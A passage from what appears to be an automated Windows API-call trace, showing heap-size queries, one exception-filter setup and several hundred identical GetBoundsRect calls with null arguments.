¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x89|N%\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0145.022] RtlSizeHeap (HeapHandle=0x1e0000, Flags=0x0, MemoryPointer=0x1e2ab0) returned 0x80 [0145.023] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4088ff) returned 0x0 [0145.023] RtlSizeHeap (HeapHandle=0x1e0000, Flags=0x0, MemoryPointer=0x1e2ab0) returned 0x80 [0145.024] RtlSizeHeap (HeapHandle=0x1e0000, Flags=0x0, MemoryPointer=0x1e2ab0) returned 0x80 [0145.025] RtlSizeHeap (HeapHandle=0x1e0000, Flags=0x0, MemoryPointer=0x1e2ab0) returned 0x80 [0145.025] RtlSizeHeap (HeapHandle=0x1e0000, Flags=0x0, MemoryPointer=0x1e2ab0) returned 0x80 [0145.026] RtlSizeHeap (HeapHandle=0x1e0000, Flags=0x0, MemoryPointer=0x1e2ab0) returned 0x80 [0145.026] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.026] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.027] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.027] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.027] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.027] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.027] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.027] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.027] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.027] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.027] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.027] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.027] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.027] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.027] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.027] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.027] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.027] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.027] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.027] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.027] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.027] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.027] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.027] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.027] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.027] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.027] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.027] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.027] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.027] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.027] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.028] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.028] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.028] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.028] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.028] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.028] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.028] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.028] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.028] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.028] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.028] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.028] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.028] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.028] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.028] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.028] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.028] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.028] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.028] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.028] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.028] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.028] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.028] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.028] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.028] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.028] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.028] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.029] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.029] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.029] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.029] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.029] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.029] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.029] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.029] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.029] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.029] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.029] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.029] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.029] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.029] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.029] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.029] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.029] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.029] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.029] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.029] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.029] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.029] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.029] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.029] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.029] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.029] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.029] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.029] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.029] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.029] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.030] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.030] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.030] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.030] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.030] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.030] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.030] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.030] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.030] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.030] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.030] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.030] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.030] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.030] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.030] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.030] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.030] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.030] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.030] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.030] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.030] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.030] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.030] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.030] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.030] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.030] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.030] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.030] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.031] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.031] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.031] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.031] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.031] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.031] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.031] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.031] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.031] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.031] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.031] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.031] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.031] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.031] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.031] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.031] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.031] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.031] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.031] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.031] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.031] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.031] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.031] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.031] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.031] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.031] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.032] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.032] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.032] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.032] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.032] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.032] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.032] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.032] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.032] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.032] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.032] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.032] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.032] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.032] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.032] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.032] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.032] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.032] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.032] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.032] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.032] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.032] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.032] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.032] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.032] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.032] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.032] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.032] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.032] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.032] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.033] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.033] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.033] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.033] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.033] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.033] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.033] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.033] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.033] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.033] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.033] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.033] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.033] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.033] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.033] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.033] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.033] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.033] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.033] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.033] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.033] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.033] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.033] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.033] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.033] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.033] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.033] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.033] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.034] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.034] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.034] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.034] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.034] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.034] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.034] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.034] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.034] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.034] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.034] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.034] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.034] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.034] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.034] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.034] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.034] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.034] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.034] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.034] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.034] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.034] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.034] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.034] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.034] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.034] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.034] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.034] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.034] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.035] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.035] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.035] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.035] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.035] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.035] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.035] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.035] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.035] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.035] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.035] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.035] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.035] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.035] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.035] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.035] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.035] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.035] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.035] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0145.035] 